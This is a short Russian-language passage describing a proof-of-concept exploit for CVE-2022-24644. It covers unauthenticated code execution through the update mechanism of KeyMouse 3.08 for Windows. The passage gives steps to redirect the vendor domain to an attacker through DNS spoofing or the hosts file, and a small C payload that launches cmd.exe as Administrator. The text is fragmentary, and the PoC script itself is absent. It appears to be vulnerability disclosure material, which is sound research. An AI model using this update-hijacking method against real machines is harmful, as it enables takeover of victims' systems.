
Эксплойт доказательства концепции для CVE-2022-24644, демонстрирующий неаутентифицированное удаленное выполнение кода через DNS-спуфинг против механизма обновления KeyMouse Windows 3.08.
ZZ Inc. KeyMouse 3.08 (Windows) Уязвимость удаленного выполнения кода при неаутентифицированном обновлении
Использование: python3 cve-2022-24644_poc.py
Подробности в отчете на gerr.re.
www.keymouse.com на IP-адрес атакующего;
c:\windows\system32\drivers\etc\hosts на цели.
proof.c на атакующем, например, с помощью i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
В результате proof.exe выполняется в контексте пользователя Администратор с высоким уровнем целостности.